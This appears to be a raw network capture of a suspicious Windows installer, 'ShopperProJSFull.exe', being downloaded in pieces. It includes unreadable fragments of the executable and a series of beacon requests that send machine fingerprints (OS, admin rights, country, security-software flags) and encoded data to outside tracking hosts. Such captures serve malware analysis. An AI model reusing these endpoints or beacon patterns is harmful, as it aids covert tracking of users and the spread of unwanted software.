.R.!.F.>....$....U..b!.AI...T...,.E...p.M..Ji.MI..#[........D..}...
?/....X...g.1\...F).W.S@.'2..~...:5..]F.hE.. E.|......R!D.\......$.p,'
$1........&z.k..]..a...m-.r&......D........OT.........F...c..y.3!k<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=2250000-2499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Date: Tue, 08 Sep 2015 06:54:20 GMT

Last-Modified: Tue, 08 Sep 2015 05:20:17 GMT

ETag: "c605c91aadcbb1556cc6923f21bf4eac"

Accept-Ranges: bytes

Server: AmazonS3

Content-Range: bytes 2250000-2499999/2707440

X-Cache: Miss from cloudfront

Via: 1.1 2b7e0587e76bdc8afc2d63bea659b942.cloudfront.net (CloudFront)

X-Amz-Cf-Id: jhA6EesaAuJBvpFfAKX13majfsiBM4YSIFoPnEvk4vxX-VPOuQ3JeQ==
HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..
Content-Length: 250000..Connection: keep-alive..Date: Tue, 08 Sep 2015
 06:54:20 GMT..Last-Modified: Tue, 08 Sep 2015 05:20:17 GMT..ETag: "c6
05c91aadcbb1556cc6923f21bf4eac"..Accept-Ranges: bytes..Server: AmazonS
3..Content-Range: bytes 2250000-2499999/2707440..X-Cache: Miss from cl
oudfront..Via: 1.1 2b7e0587e76bdc8afc2d63bea659b942.cloudfront.net (Cl
oudFront)..X-Amz-Cf-Id: jhA6EesaAuJBvpFfAKX13majfsiBM4YSIFoPnEvk4vxX-V
POuQ3JeQ==...b7...>1u.3.bF*:Oj........T.{.t.N3..r[.ti.h..#....^2...
.8..).q.6.....qX.:..C-c8...Q.....6^.)7KA5....w.?.e....G..L*WCq...8,.f.
$..J........&.5...^._.................V._-....P..!..J...r$..4...R.de..
.o.3vKL..s..!w,U......Q...W...>..3..qm.5..\...0..7.?0...c.,g..v....
G....X.....W.sRT.Cp.. =....).\<......qz..:..=.#%.{j'.....o.....W...
./.,[.'....g_$w..e..T......r..O.{.......F7Z...*..$0..$..r............X
.k....v......gF7/.#C.\s.F../*e.K.^[email protected]..,......
T........q;,.0...... ..?2*}.&...6g8u....9.*..7v.mC.ypAG...K...8*zv....
....u....}...P.;..g3..@.*^.......VH.....i.#.S=A7...~z.....7... ...f.=O
.jP=.J...g...........?Y...[.Gp.\K-J...)C.y..!.....S...".>@&...%[M.^
.6~.)...K.]S...O..2H.h.m...c....PU......a77.#...b.C.?.n..C..~.Ji..'.f.
~. ...LSe(.......F.(...K ?x.A.#......5cB....1q..=S.O.o....v4|8.4.plI0t
.....U.4f.7w8...=..F=.t.)..n...].d{.ry.g..i.8.Z..."H......>^..!....
..6....'...lv.(..%.G6b8.O.A.[C.]9n].\/...h.c.k..}.G@\.......7.....AKT.
<........L.,,......r.f.vIY..T.d...A..s...... >2..s.....(W...<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=2500000-2707439

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 207440

Connection: keep-alive

Date: Tue, 08 Sep 2015 05:30:43 GMT

Last-Modified: Tue, 08 Sep 2015 05:20:17 GMT

ETag: "c605c91aadcbb1556cc6923f21bf4eac"

Accept-Ranges: bytes

Server: AmazonS3

Age: 5017

Content-Range: bytes 2500000-2707439/2707440

X-Cache: Hit from cloudfront

Via: 1.1 2b7e0587e76bdc8afc2d63bea659b942.cloudfront.net (CloudFront)

X-Amz-Cf-Id: gPc6H7RTXBaJfM6rD9Thn3fCXwMJUh3z8pHm9XwWDwqZYPnu53fB_w==
3.}....&.wU..B....:.'...4..._.X.U.........eD ..2x.....1`.M~.A$Fc..s...
[email protected].. ..mP..30...W...(.......I.jc....o.......n....Mhdx......Qu|."..
.";..B....r8. _I.]$....5h.=..M.........t.......M~r......K.L.....n....P
.S 0.Qf....;"[....O.......7t.&94....C....`..2~.3........]...t.....2).B
....F....LL...5.,.0..L..i8...]..H..p.h.p^:.c&...',[email protected].....#.M...W.c.
v..([email protected]%.e60...q....O..02.,y.4a.........^W9.\..a../\.,-....[....54.e
....n .....g.7...._Ex....A/..d.I....`...9-.......r...EC..E....c)...p.3
Q _.....s*.s.....D.k...}..8*r.D{z........lb.z.....~..%...t.c..H.=.l.'.
.. .....n6...G`..x.......b.[....)..K.7YM.8.9. ...k....&.I...b.x..\....
..f.P....P}.....YU..........U._...../.......d.^.@.])...~.....x.Q.....J
O....M.CB]..o.`.<....?....b;..UKH.w...}.....t...z.(2.....b.l4....L,
...U.X..>0..A_n.#P.S.N....n....3.^[email protected].>......4..z...K.
Ek..f$.q...{.W.....'.wZ.".$W. 8..yW....O....B.........oF..X.Bn..z.cP..
.....~..y....PR4..Zg.C..h...l...h...8.[.P..2t..X..C$t.OZ..2C,4O.e..3o.
{.o9.*..;.z...w.......~kw#eT.bfV.F..k...(36..u1rS.J.W.A.........2.....
...O7&...x..g..|t.l..M..` }...b2.*.....J.E.. !O7..G..T.J%........ZS.D.
...f..'P3M.5...uM.J......E..k .T.)..*..._!....Y..m......].i.L...4.5...
....YwQ.....2..eX.8...R}...b...O.V.)....3H........w'......C..=[..)6erJ
}C....>...F0.........W...P.......uh5t....jx.9...%..........u.1..4.H
{.?.....%......s.......iT..|."].C....A... v..p......5.Aon....J.>.ij
....5..LF.|....R*.;tI.3..v..<|@.....,.f.Ó..hG.T.W'.Q-....2N./.0M.
....'Y.ZU.n#`_.....i....s.2T.t..f.O..dA..&(..C,#[email protected].<<< skipped >>>

GET /utility.gif?report=fdata&f=1&c=001729&i=100&n=init_start_funnel_step_name&rnd=1441695305 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: 3qV98roaYql 5nchRwa6y092i19jeAtKH/aDLY h2bcmtQmXLUu07ompmrt2wHpz

x-amz-request-id: FF2F757BDABB8252

Date: Tue, 08 Sep 2015 06:55:04 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: 3qV98r
oaYql 5nchRwa6y092i19jeAtKH/aDLY h2bcmtQmXLUu07ompmrt2wHpz..x-amz-requ
est-id: FF2F757BDABB8252..Date: Tue, 08 Sep 2015 06:55:04 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....


GET /installer-error.gif?action=sesamy&app=70881&appver=0&ver=1_36_01_22&version_date=15-09-08&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=7064429D9C88417885E6E9F5385B8646PI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGOFV6b2JyZGMxLDk5OTk5OTk5LTk5OTktNDE5YS04MWVmLWY2ZDZkZDU3MDgxYywiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTQxOWEtODFlZi1mNmQ2ZGQ1NzA4MWMifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1441695305&procruntime=9&rnd=1441695314 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: ae9kHfUuFXuiOrsAQajNcdjdtwjHiwUdiMlyyh0ooVf/Entx e/tPo9VL1t/CYAW

x-amz-request-id: 7933AAD75CCF5A72

Date: Tue, 08 Sep 2015 06:55:11 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:11 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: ae9kHf
UuFXuiOrsAQajNcdjdtwjHiwUdiMlyyh0ooVf/Entx e/tPo9VL1t/CYAW..x-amz-requ
est-id: 7933AAD75CCF5A72..Date: Tue, 08 Sep 2015 06:55:11 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Sun, 02 Aug 2015 13:00:11 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=001729&i=200&n=init_end_funnel_step_name&rnd=1441695314 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: eKjcKKbf/ytq1aXRYRjlAPrOEZZ j0XViasbUqyk3R8pGLuOOyo0rVrLPEQ1w41U

x-amz-request-id: F454ED3F30B32108

Date: Tue, 08 Sep 2015 06:55:12 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=001729&i=300&n=deploy_start_funnel_step_name&rnd=1441695314 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: NFcbKz5fK46h/QjoPu5kwvwZbtOsJTVG1sbv21lHKA0I3DfiFUFr69NGQHVKrLyv

x-amz-request-id: BFD9EE443E0B13BD

Date: Tue, 08 Sep 2015 06:55:12 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: NFcbKz
5fK46h/QjoPu5kwvwZbtOsJTVG1sbv21lHKA0I3DfiFUFr69NGQHVKrLyv..x-amz-requ
est-id: BFD9EE443E0B13BD..Date: Tue, 08 Sep 2015 06:55:12 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=001729&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1441695316 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: vzdHIbXOP6 HwzW4TZ/Teme35YOpc3dw8ZT4Zd9 ep9VxyQtLrdXf9HMMkex8m/e

x-amz-request-id: F88CA52E2E0A8144

Date: Tue, 08 Sep 2015 06:55:13 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: vzdHIb
XOP6 HwzW4TZ/Teme35YOpc3dw8ZT4Zd9 ep9VxyQtLrdXf9HMMkex8m/e..x-amz-requ
est-id: F88CA52E2E0A8144..Date: Tue, 08 Sep 2015 06:55:13 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=001729&i=500&n=deploy_notification_start_funnel_step_name&rnd=1441695316 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: PdAs5m34RP7dn5roxk84GK zaKr pk9b/Ixk3Gu/r5CUr1gDeaMV54yEeRJUxGgB

x-amz-request-id: DF236655BB743B83

Date: Tue, 08 Sep 2015 06:55:14 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=001729&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1441695317 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: 6XA8zn8skVTHT6Oe6QqPnSncB3 dWVBa3sJxa3mDhRf6W1bX7RJriDdrwSBFm/TJ

x-amz-request-id: 925DE31B29FA5608

Date: Tue, 08 Sep 2015 06:55:14 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=001729&i=700&n=deploy_ch_start_funnel_step_name&rnd=1441695317 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: hyF/8M3a/44UszjkfVMc3I2P emGNm A0t9vjCnIhMm f zx1XhQLsJlcf/WP1ZS

x-amz-request-id: 0F2D34D9E88547E6

Date: Tue, 08 Sep 2015 06:55:14 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=001729&i=800&n=deploy_nova_start_funnel_step_name&rnd=1441695317 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: ovbCEDzODJPHr3jhsWK26y3b/NRDj0VPm/qomRMePrmmSHCc8wUw0HW9oZqm3SH7

x-amz-request-id: A5374659323C12D8

Date: Tue, 08 Sep 2015 06:55:15 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=001729&i=900&n=deploy_ff_start_funnel_step_name&rnd=1441695317 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: f ei/zapMFqU/hl5cC3rNPTCmi7jCzwEOcydAN3Zs/mWpF3Jx0HxTm05KvEAH16J

x-amz-request-id: F3C8D808F4A4ADB9

Date: Tue, 08 Sep 2015 06:55:15 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: f ei/z
apMFqU/hl5cC3rNPTCmi7jCzwEOcydAN3Zs/mWpF3Jx0HxTm05KvEAH16J..x-amz-requ
est-id: F3C8D808F4A4ADB9..Date: Tue, 08 Sep 2015 06:55:15 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=001729&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1441695317 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: 0L5ymyglOJTHycYg/LW4p1F7b6Y1CRwWI9N/hhyIc2Ez67uwbHWLoh2x SjlyPtk

x-amz-request-id: 3BA1C09A320B0503

Date: Tue, 08 Sep 2015 06:55:15 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=001729&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1441695318 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: 6mWPvxtrfukg5Mhm3Rm LY4QPqXrrjwwmxG5JvKPDd6sPhq//epYcJ/t/kSVdn/e

x-amz-request-id: 7CB757858B8C6452

Date: Tue, 08 Sep 2015 06:55:15 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=001729&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1441695318 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: mmn5etxpMVtA7FEjwOku13HOV5Km mJWCRNu0Mm4t4eqUwNjvwCNHYF/DtQG7QbJ

x-amz-request-id: 891E00023B51751F

Date: Tue, 08 Sep 2015 06:55:15 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: mmn5et
xpMVtA7FEjwOku13HOV5Km mJWCRNu0Mm4t4eqUwNjvwCNHYF/DtQG7QbJ..x-amz-requ
est-id: 891E00023B51751F..Date: Tue, 08 Sep 2015 06:55:15 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=001729&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1441695318 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: yIXSANoNjoFpAlbalTnAbie8X2d4YlsEBqNqpfrCTrWW2yUI3CnH1YpqEMeXlJaI

x-amz-request-id: 2FFBC52A04D2EE7C

Date: Tue, 08 Sep 2015 06:55:16 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: yIXSAN
oNjoFpAlbalTnAbie8X2d4YlsEBqNqpfrCTrWW2yUI3CnH1YpqEMeXlJaI..x-amz-requ
est-id: 2FFBC52A04D2EE7C..Date: Tue, 08 Sep 2015 06:55:16 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=001729&i=10000&n=deploy_end_funnel_step_name&rnd=1441695319 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: 1ZWyPd SG3zlWwRM2/PhWrA/7unKAg7MHxg93wHtPlnmq7d3lZ9Qmc7YQiNfCss4

x-amz-request-id: 262170B88A85D23F

Date: Tue, 08 Sep 2015 06:55:16 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: 1ZWyPd
 SG3zlWwRM2/PhWrA/7unKAg7MHxg93wHtPlnmq7d3lZ9Qmc7YQiNfCss4..x-amz-requ
est-id: 262170B88A85D23F..Date: Tue, 08 Sep 2015 06:55:16 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;..

GET /21214.ashx?e=obiBp3WOda875Lloa5mq/1A3FobYz9pDW1tgKrNy38lA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY8E9cK9dYE7s6Dkd6d9pF8iTYCy99Gl4E9Wqh4iojbHdqGvv5sqhroDaM1aE/ClNTTua4Maub6eC74r1XQZFERJL7ZfSEVa6OEQyD12F 1Nyjgb6v7cXpPt2nKkLkHTcAQh7fCP95dTKIvain/ mm qbu5v3xCXDGx8nj342zNscaFm7B 9FuQufg5RFwTuVQNkfjvqjwagYFSalK01pNv1rgCpvLjSxnlO8xmMRVWZOb7j5JAyiJ5DwvGnwcuiCjBHn3WtPO7TkPk55LBQN29raE2JuypHmFWVSvOHNjNGnq4HymoAeTplYsVN63O8acvsG738OKyeGhM1IhxvZTJw= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:19 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21214.ashx?e=uWabAt9SLcyBuMQa44hX0CgKFoNUu98snvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRg11yv0z2CgIWebjftHCncAtgsbAq9cfMqLQ1AVjbz2R20qHT6WNWM4V 9m YgK2IN2ZOiYEsonqrXIxNf6X/p9IxKFhhAIX38mxw368usKjpjurIyC9QLCNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVZZXXlPOL JdxOsvBqt15abnG0MGS7MFn HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:19 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21214.ashx?e=uWabAt9SLcyBuMQa44hX0CgKFoNUu98snvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRg11yv0z2CgIWebjftHCncAtgsbAq9cfMqLQ1AVjbz2R20qHT6WNWM4V 9m YgK2IN2ZOiYEsonqrXIxNf6X/p YSQXKBzk9X6XwtLXz/thLs IILilpWF2i0VMQ3MIkYUWlOV1/FwpsQI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiY5ZMFGhcknP srAPq35vVlHiPVU04Syd1JReJqqw1xf7 h81hw0eWAY8/tWrUBEVB2BoZjQ6FIIw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:19 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21214.ashx?e=uWabAt9SLcyBuMQa44hX0CgKFoNUu98snvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRg11yv0z2CgIWebjftHCncAtgsbAq9cfMqLQ1AVjbz2R20qHT6WNWM4V 9m YgK2IN2ZOiYEsonqrXIxNf6X/p/HmSIpx5WtIABZGQjpShx/0JQd5HxgIXfHd4yt /3jYZEcs3sjXWP5pqLgzsej8XLE0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9KybE/th1ZHmv0EomROJjSQrgPyvVweGBaX HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:20 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21214.ashx?e=uWabAt9SLcyBuMQa44hX0CgKFoNUu98snvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRg11yv0z2CgIWebjftHCncAtgsbAq9cfMqLQ1AVjbz2R20qHT6WNWM4V 9m YgK2IN2ZOiYEsonqrXIxNf6X/p9DLf a7VREBQC drCF7eFSWMoVW1eu9C5 wx ILhhSxoWNAP4OWMILkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBwLgrSkZSFaNnd/rihenux9DwqPoy7y/e9FgAYD7IlOOQUT2GlJZn0XRSL9MKpLGedUpfWelS8fiA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:20 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21214.ashx?e=uWabAt9SLcyBuMQa44hX0CgKFoNUu98snvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRg11yv0z2CgIWebjftHCncAtgsbAq9cfMqLQ1AVjbz2R20qHT6WNWM4V 9m YgK2IN2ZOiYEsonqrXIxNf6X/p97T8dW3vpmMBQC drCF7eFnfXu8jqisF9cJKC1Reo3n9s2Fs g80z0k6Cr9laSF2XrRbZnBny0uhv3iEz1ZNnAYhSLf3gsJzhYWVjeFKSrgJuiaaVAZCiP8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWPBPXCvXWBO7Og5HenfaRfIk2AsvfRpeBPl2Ah9DV9msw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:20 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

